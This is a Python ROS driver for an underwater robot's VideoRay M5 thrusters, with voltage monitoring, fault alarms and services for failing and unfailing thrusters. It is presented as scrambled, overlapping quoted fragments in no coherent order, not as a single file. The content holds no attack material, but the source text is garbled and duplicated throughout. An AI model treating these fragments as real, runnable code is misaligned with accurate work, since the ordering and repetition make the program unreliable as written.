"usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path",
"if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in",
"ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock",
"or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust",
"a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map =",
"self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage",
"for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver:",
"] message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] *",
"configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is offline",
"Adds voltage readings to buffer ''' voltage = float(voltage) # Only add if",
"of May 2017, this is just a simple rolling average with a constant",
"4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = []",
"force command (in Newtons) to a named thruster Example names are BLR, FLH,",
"Feedback on thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service",
"the window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now() -",
"if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands",
"accordingly Sets the severity to the number of failed thrusters (clipped at 5)",
"= 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver,",
"one for each thruster If there are any updates to the list of",
"the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter",
"we need to make sure to raise it again if not alarm.raised and",
"names to the appropriate port - Given a command message, route that command",
"readings to buffer ''' voltage = float(voltage) # Only add if it makes",
"to the number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters)",
"describing the status of the particular thruster ''' self.failed_thrusters = set() # This",
"''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly",
"port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)",
"time): self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration -",
"class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of May",
"and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might",
"parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self,",
"if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm()",
"+ name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back",
"VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v =",
"Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map",
"wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before",
"!= severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity )",
"this alarm, we need to make sure to raise it again if not",
"These will not come back online even if comms are good (user managed)",
"make it available to other nodes - Instantiate ThrusterPorts, (Either simulated or real),",
"'offline_thruster_names' parameter accordingly Sets the severity to the number of failed thrusters (clipped",
"in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power,",
"command message, route that command to the appropriate port/thruster - Send a thruster",
"self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if comms are",
"thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect",
"thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get",
"name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can",
"self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before:",
"parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout =",
"passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings",
"'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in",
"rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter)",
"went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not",
"r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and",
"comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions,",
"- Track a thrust_dict, which maps thruster names to the appropriate port -",
"None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage':",
"rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds",
"with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): '''",
"object for commanding all of the sub's thrusters - Gather configuration data and",
"1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): '''",
"import copy import rospy import rospkg import rosparam import threading import argparse from",
"port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {}",
"> self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages",
"fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation ''' # So",
"some settings to take effect def get_thruster_info(self, srv): ''' Get the thruster info",
"thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm(",
"and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try",
"prune_buffer(self): ''' Removes readings older than the window_duration from buffer ''' for reading",
"{}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to",
"1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4):",
"return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name)",
"is just a simple rolling average with a constant width sliding window. However",
"in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for",
"[] for code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name)",
"require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() #",
"thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside",
"that is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port",
"thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be",
"if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name))",
"self.deactivated_thrusters = set() # These will not come back online even if comms",
"VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time def __init__(self,",
"a a force command (in Newtons) to a named thruster Example names are",
"= rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout,",
"+ thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id,",
"self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity",
"name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0],",
"mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from",
"0 thrust to all thrusters ''' for port in self.ports.values(): for thruster_name in",
"import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's",
"thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {}",
"# We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track",
"''' Returns average voltage in buffer ''' voltages = [] if len(self.buffer) ==",
"if a thruster that is offline is commanded a non-zero thrust ''' port_name",
"''' Commands 0 thrust to all thrusters ''' for port in self.ports.values(): for",
"self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a",
"parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name =",
"'''Thruster driver, an object for commanding all of the sub's thrusters - Gather",
"to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters']) rospy.spin()",
"if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status,",
"that it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) #",
"return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ]",
"thrust to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) #",
"driver, an object for commanding all of the sub's thrusters - Gather configuration",
"to the appropriate port - Given a command message, route that command to",
"def get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster name",
"self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock)",
"port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to",
"ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster,",
"that estimates sub8's thruster bus voltage. As of May 2017, this is just",
"= {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False)",
"all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0)",
"port - Given a command message, route that command to the appropriate port/thruster",
"= rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter",
"updates to the list of failed thrusters, it will raise and alarm '''",
"needed ''' VMAX = 50 # volts VMIN = 0 # volts class",
"- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track",
"to make sure to raise it again if not alarm.raised and alarm.node_name !=",
"{ (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT',",
"raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self):",
"self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} #",
"info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return",
"5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names},",
"rolling average with a constant width sliding window. However add_reading and get_estimate methods",
"a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name]",
"rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\")",
"settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +",
"for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster",
"= AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage =",
"thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds",
"name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and",
"a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster",
"numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from",
"self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate',",
"std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param,",
"message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1):",
"is commanded Raises UnavailableThrusterException if a thruster that is offline is commanded a",
"for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port",
"unreliable (might not still be true - David) if message_keyword_args['fault'] > 2: fault_codes",
"simulated or real), for communicating with thrusters - Track a thrust_dict, which maps",
"voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)",
"if bus_voltage < self.kill_voltage: severity = 5 if severity is not None and",
"{}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect",
"rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based",
"port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self, srv): '''",
"list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters ==",
"#!/usr/bin/env python import numpy as np import copy import rospy import rospkg import",
"s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions):",
"direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this",
"or real), for communicating with thrusters - Track a thrust_dict, which maps thruster",
"BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically",
"if the thruster status is bad if thruster_status is None: return message_contents =",
"commanding non-zero thrust to offline thruster (' + name + ')') effort =",
"service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage",
"are unreliable (might not still be true - David) if message_keyword_args['fault'] > 2:",
"Raises RuntimeError if a thrust value outside of the configured thrust bounds is",
"bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable",
"''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__",
"rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id']",
"layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if",
"has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object):",
"bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if",
"(Either simulated or real), for communicating with thrusters - Track a thrust_dict, which",
"thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and configure if",
"in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the",
"in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters",
"configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not",
"44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD =",
"= {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack",
"average with a constant width sliding window. However add_reading and get_estimate methods are",
"for some settings to take effect def get_thruster_info(self, srv): ''' Get the thruster",
"max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else",
"in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed",
"updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of",
"port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0]",
"instructions, one for each thruster If there are any updates to the list",
"volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v",
"''' voltages = [] if len(self.buffer) == 0: return None for r in",
"AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster",
"calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout'",
"# These will not come back online even if comms are good (user",
"0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings to",
"non-zero thrust to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)",
"RuntimeError if a thrust value outside of the configured thrust bounds is commanded",
"0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): '''",
"len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def",
"from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import",
"{key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus(",
"which to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub",
"'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key",
"number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters)",
"{} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's",
"= rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all",
"''' Get the thruster info for a particular thruster name ''' query_name =",
"2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1",
"the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to",
"= 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify",
"rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require",
"thruster_definitions): '''Thruster driver, an object for commanding all of the sub's thrusters -",
"someone else cleared this alarm, we need to make sure to raise it",
"VMAX = 50 # volts VMIN = 0 # volts class VoltageReading(object): def",
"self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def",
"{}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for",
"= list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5)))",
"thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server",
"a thrust value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException",
"position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else cleared",
"thruster status is bad if thruster_status is None: return message_contents = [ 'rpm',",
"rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster,",
"is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity =",
"all of the sub's thrusters - Gather configuration data and make it available",
"fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault",
"argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for",
"nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters -",
"As of May 2017, this is just a simple rolling average with a",
"'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self):",
"a simple rolling average with a constant width sliding window. However add_reading and",
"voltages = [] if len(self.buffer) == 0: return None for r in self.buffer:",
"allocation ''' # So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name)",
"ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track a thrust_dict,",
"it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So",
"rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for",
"to the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)",
"the appropriate port - Given a command message, route that command to the",
"self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self):",
"- Given a command message, route that command to the appropriate port/thruster -",
"config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings",
"of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port:",
"Thruster came online # Don't try to do anything if the thruster status",
"threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of",
"a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info =",
"<< 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults =",
"configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args =",
"commands These messages contain a list of instructions, one for each thruster If",
"the appropriate port/thruster - Send a thruster status message describing the status of",
"at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names':",
"allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online",
"rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')') effort",
"port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name))",
"< self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if",
"thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline",
"self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration - float",
"MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id",
"''' Callback for receiving thrust commands These messages contain a list of instructions,",
"This is only determined by comms self.deactivated_thrusters = set() # These will not",
"if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or",
"target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust",
"offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command (in",
"s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for",
"> self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from",
"is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model",
"node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring",
"rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity =",
"0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t",
"import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from",
"thrusters to the thruster dict and configure if present for thruster_name in port_info['thruster_names']:",
"lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage.",
"even if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\",",
"interference # Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout,",
"{name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms",
"status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback",
"thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can use this",
"port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name",
"self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time):",
"just a simple rolling average with a constant width sliding window. However add_reading",
"rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage,",
"and alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in",
"<< 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 <<",
"for thrust allocation ''' # So that thrust is not allocated to the",
"a constant width sliding window. However add_reading and get_estimate methods are left for",
"(might not still be true - David) if message_keyword_args['fault'] > 2: fault_codes =",
"nonsense feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage,",
"if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older",
